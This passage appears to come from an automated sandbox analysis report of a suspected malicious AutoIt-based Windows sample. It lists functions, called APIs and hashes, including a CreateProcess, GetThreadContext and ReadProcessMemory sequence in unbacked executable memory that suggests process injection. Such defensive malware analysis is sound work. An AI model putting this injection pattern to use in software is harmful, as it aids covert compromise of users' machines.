                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        • Opcode ID: be470cd129fff612b1dc4b2ad5f6b8aeae5a1a48ee83f12100ad8f54ec25987b
                                        • Instruction ID: 666740f03d8e1604966ba405481c7f7108b6ccb3c0be5b175f5775d3280cef9a
                                        • Opcode Fuzzy Hash: be470cd129fff612b1dc4b2ad5f6b8aeae5a1a48ee83f12100ad8f54ec25987b
                                        • Instruction Fuzzy Hash: CC01B5729042587EDF28C7A8C856EEEBBFC9B05301F00455AE192E2182E5B4EA089B60
                                        Function 00073837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00073908
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: c8e439cbdd07f7b85741d00d0a726d39e4ccddb00ec4a793041c485faa0b5bf2
                                        • Instruction ID: 02b727eb2b95627d961c93783d0cd1eb29eef01dbedad6bd4f26d623f90bf069
                                        • Opcode Fuzzy Hash: c8e439cbdd07f7b85741d00d0a726d39e4ccddb00ec4a793041c485faa0b5bf2
                                        • Instruction Fuzzy Hash: DF319370904301AFE760DF24D8847D7BBE4FB49718F00092EF59D83651E775AA84DB56
                                        Function 0007B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0007BB4E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: 9fc351bdf04dc3d087bb28b60dbb788f0634db14876fb6576403d67ad87e6b80
                                        • Instruction ID: 2e5a4d03afaea87d1a107801654364875dfdace254eaed8aab010408b1f4872d
                                        • Opcode Fuzzy Hash: 9fc351bdf04dc3d087bb28b60dbb788f0634db14876fb6576403d67ad87e6b80
                                        • Instruction Fuzzy Hash: 78327934E00209EFDB24DF54C894FBEB7F9EB45304F148059E919AB262D778AE81CB95
                                        Function 0139129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01391A5B
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01391AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01391B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                        • Instruction ID: ae4fe05832afc718b7e3b241fc9b5f9ea6ada48ef9eb537aed5f27827ca6ebeb
                                        • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                        • Instruction Fuzzy Hash: 7C12BF24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                        Function 0008FC70 Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 695c1374db9719516f13716646ec579bd3a283909b94a6a3b545f1162212a3ab
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: FA311674A0020ADBC758EF69D580969FBA2FF49310B2482A5E849CF751D731EEC1CBC0
                                        Function 00074ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00074E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E9C
                                          • Part of subcall function 00074E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00074EAE
                                          • Part of subcall function 00074E90: FreeLibrary.KERNEL32(00000000,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EFD
                                          • Part of subcall function 00074E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E62
                                          • Part of subcall function 00074E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00074E74
                                          • Part of subcall function 00074E59: FreeLibrary.KERNEL32(00000000,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 7bb5c82de1d0095be02d83efd4d5febf1cfe1cb4b56cb5443a15328cc7fd8b73
                                        • Instruction ID: 8a7aea85d6306422029c7b49dccc6de84e497cf9e66994e1d65848f53e90ff1e
                                        • Opcode Fuzzy Hash: 7bb5c82de1d0095be02d83efd4d5febf1cfe1cb4b56cb5443a15328cc7fd8b73
                                        • Instruction Fuzzy Hash: 8711E731A00205ABDF24FF60DC02FED77A5AF40711F20C42DF54AA61C2DFB89A459B94
                                        Function 000A8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: cfe78d4a30eabf751c1dd50c6656beb070d1e8c0274f3ce8154aa75b38fa3355
                                        • Instruction ID: 0837bfaf8b8d4d8103984c74357f10fb1ebcf84ab4c062cf3a6505a4b19aae7f
                                        • Opcode Fuzzy Hash: cfe78d4a30eabf751c1dd50c6656beb070d1e8c0274f3ce8154aa75b38fa3355
                                        • Instruction Fuzzy Hash: 5A11187590420AAFCB15DF98E9419DE7BF9EF49314F148059F808AB312DA31DA11CBA5
                                        Function 000A5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000A4C7D: RtlAllocateHeap.NTDLL(00000008,00071129,00000000,?,000A2E29,00000001,00000364,?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?), ref: 000A4CBE
                                        • _free.LIBCMT ref: 000A506C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction ID: 577205c389a08045f2fc90533c77d58859d9370347d36b42dcbe815168247093
                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction Fuzzy Hash: 1B014E722047045BE3318F95DC45E9AFBECFB8A370F25051DE184832C0E6706805C774
                                        Function 0009E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction ID: fa39d63f5c00e36a7d067b5c7dfeaa82316dd03b60575e6e7a0531e08feb2eac
                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction Fuzzy Hash: D8F0F432510E10AADE317AA9DC05BDA33989FA33B4F100725F820962D3DB70DC01A6A5
                                        Function 00079CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID:
                                        • API String ID: 176396367-0
                                        • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                        • Instruction ID: 972b0214609d4d6ff08806e3665261eb5b2606036ad6191a0a3f182e87aa50b7
                                        • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                        • Instruction Fuzzy Hash: BBF0CD736007056ED7255F38D806EA7BB94EB44760F10853AF619CB1D2DB71E51087A4
                                        Function 000A4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00071129,00000000,?,000A2E29,00000001,00000364,?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?), ref: 000A4CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 76307db6c3ce195d99abeb1c5f6717844b172cd17c41ee9af9563c198a3a2ff2
                                        • Instruction ID: fc556d1419c3d57a8da48a6355c7eaf7694b06e9a3d4157297ea744175d2d130
                                        • Opcode Fuzzy Hash: 76307db6c3ce195d99abeb1c5f6717844b172cd17c41ee9af9563c198a3a2ff2
                                        • Instruction Fuzzy Hash: A5F0E93960622467DFE15FE29C09F9A37C8BFC37B0B144221B81DE7191CAF0D80156E0
                                        Function 000A3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 25d2d7ee1fd53ce6d22d1ec45bc6aed9cb068f6634d524e18a95bed7640b4831
                                        • Instruction ID: 24cebe2a869a863aa5d0f01cd3dee5035c345b25ee33eed80ab2c048266ce3a7
                                        • Opcode Fuzzy Hash: 25d2d7ee1fd53ce6d22d1ec45bc6aed9cb068f6634d524e18a95bed7640b4831
                                        • Instruction Fuzzy Hash: 70E0ED31102326A6EA312BE69C05FDA3A88AF43BB0F050120BC0496892DF28DE0292E0
                                        Function 00074F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074F6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 339e6bf147ad21ace937890510cba0c30e822454159575961f0508ae955bb16e
                                        • Instruction ID: a40bbf57f4aea35669bf90ddc7c629925e36f5e36a2a34dc761313cdc85cfbbb
                                        • Opcode Fuzzy Hash: 339e6bf147ad21ace937890510cba0c30e822454159575961f0508ae955bb16e
                                        • Instruction Fuzzy Hash: BBF0A970805342CFCB349F24D490826FBE0EF00329320CA7EE1EE82621C7369884DF04
                                        Function 00072DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00072DC4
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: a764689968572bbb9dbf23215b0e84400a99848acdc513d6496f9dac7133f30d
                                        • Instruction ID: 1b88dbd068e74a0dc3a77850050af2b99c7338c79bbd82e05da7e550161a0d19
                                        • Opcode Fuzzy Hash: a764689968572bbb9dbf23215b0e84400a99848acdc513d6496f9dac7133f30d
                                        • Instruction Fuzzy Hash: 3FE0CD72A001245BC71093589C05FEA77DDDFC8790F044171FD09D7249DA64ADC0C590
                                        Function 000E2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction ID: 5fa82d7c74d40bbb30e7500dbfd073c2231fdb996f6285eed13b7f225e3b5849
                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction Fuzzy Hash: 30E0DFB0209B004FCF389A28A8517F7B7E89F09300F00082EF6DF92212E57228418A0D
                                        Function 00072B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00073837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00073908
                                          • Part of subcall function 0007D730: GetInputState.USER32 ref: 0007D807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00072B6B
                                          • Part of subcall function 000730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0007314E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        • Opcode ID: 01c6c7e3b045d97caf97f9e07fca64021de123aaff110004042f6a1cc2cf7305
                                        • Instruction ID: 7abae63441821988f969bfd13122b3a77b587d641afaa88f6fd072afdb2dd339
                                        • Opcode Fuzzy Hash: 01c6c7e3b045d97caf97f9e07fca64021de123aaff110004042f6a1cc2cf7305
                                        • Instruction Fuzzy Hash: DDE07D21F0420813C608BB30A8124FDB7599FD2311F40853EF08E431B3CF2C89C5835A
                                        Function 000B039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,000B0704,?,?,00000000,?,000B0704,00000000,0000000C), ref: 000B03B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 89467b7899d325a8228b1d28eabe7990d6b92561eb7674a1e5d370f975243130
                                        • Instruction ID: 22fc57f339a883237423f366fa14cb9fdeeeb34726a496db24b3bb6cd4e021e3
                                        • Opcode Fuzzy Hash: 89467b7899d325a8228b1d28eabe7990d6b92561eb7674a1e5d370f975243130
                                        • Instruction Fuzzy Hash: C9D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014100BE5856020C772E861AB90
                                        Function 00071CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00071CBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        • Opcode ID: 183ebecb38316ef79f1e5496f15f6fa05b081fc72644c146ff027757d749a148
                                        • Instruction ID: 4fb6ff73f4c030e68ad1b9be4fe2da6af17923a1c4700c21f40272c27f665f49
                                        • Opcode Fuzzy Hash: 183ebecb38316ef79f1e5496f15f6fa05b081fc72644c146ff027757d749a148
                                        • Instruction Fuzzy Hash: 4BC0483A380205AAE2148B80AC4AF5077A4A34AB10F448001F649A99F382A228E0AA90
                                        Function 013922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 013922B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Sleep
